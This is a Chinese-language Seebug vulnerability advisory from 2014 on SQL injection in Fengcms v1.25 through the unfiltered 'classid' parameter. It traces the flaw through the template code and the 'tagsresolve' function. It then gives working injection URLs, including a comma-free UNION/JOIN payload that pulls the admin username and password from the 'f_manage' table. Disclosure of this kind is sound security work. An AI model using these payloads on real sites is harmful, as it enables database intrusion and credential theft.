Fengcms v1.25 SQL注入漏洞

2014-08-12T00:00:00
ID SSV:95455
Type seebug
Reporter Root
Modified 2014-08-12T00:00:00

Description

简要描述:

过滤不严,绕过并注入

详细说明:

Template/article.html和Template/article_class.html中 {$classid=$_GET[‘classid’]}//直接GET传入

<div class="home_box"> <div class="boxtitle"> <h3>最新推荐</h3> </div> <ul class="list_12"> {loop M("module")->l("article","w[classid='$classid'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]") $k $v} //classid直接带入查询 <li><span>{date('m/d',strtotime($v['date']))}</span><a href="{url($v['html'])}">{$v['title']}</a></li> {/loop} </ul> </div> 下面的一样,就省略了

这里显然已经有注入的潜质了,就看后面查询的时候有无过滤,试试直接报错注入 http://localhost/?controller=classify&project=article&classify=&classid=1'%20and%20(select%201%20from%20(select%20count(),concat(version(),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)#

<img src="https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png" alt="QQ截图20140811101536.png" width="600" onerror="javascript:errimg(this);">

Message :Invalid SQL:select title,html,date from f_article where classid='1' and (select 1 from (select count(*) and (classid = "concat(version()") order by id desc limit 10 竟然给我变成了 and (classid = "concat(version()") 。什么玩意?? 不过这里已经看出来数据库表的前缀f_了。 继续跟,看看怎么回事。 定位model/moduleModel.php中函数l:

public function l($table,$func=""){ $array=explode(";",$func); if(count($array)&gt;1){ foreach($array as $v){ $this-&gt;tagsresolve($v); } }else{ $this-&gt;tagsresolve($func); } 。。。。 return D($table)-&gt;field($field)-&gt;where($where)-&gt;sort($sortf,$sorts,$sortp)-&gt;limit($limit)-&gt;getall();

tagsresolve函数对传过来的参数进行处理了,继续跟tagsresolve函数:

private function tagsresolve($string){ $str=substr(substr($string,2),0,-1); switch(substr($string,0,1)){ case "w": //w时 $exp=explode(',',$str);//这里用逗号分割 if($exp[1]){//如果我们的语句中有逗号,就会被处理 return $this-&gt;op['where']=$exp[0].$this-&gt;whereclass($exp[1]); }elseif($str){ return $this-&gt;op['where']=$str; } break;

whereclass就不继续跟进了 既然把没有逗号了,那就不用好了,见证明

漏洞证明:

http://localhost/?controller=classify&project=article&classify=&classid=2'%20%20UNION%20SELECT%20*%20FROM%20((SELECT%20admin%20from%20f_manage)a%20JOIN%20(SELECT%202)b%20JOIN%20(SELECT%20password%20from%20f_manage)c)%20%23

<img src="https://images.seebug.org/upload/201408/1110271942695d828d9fc98f0d2129b376d31c9c.png" alt="QQ截图20140811092820.png" width="600" onerror="javascript:errimg(this);">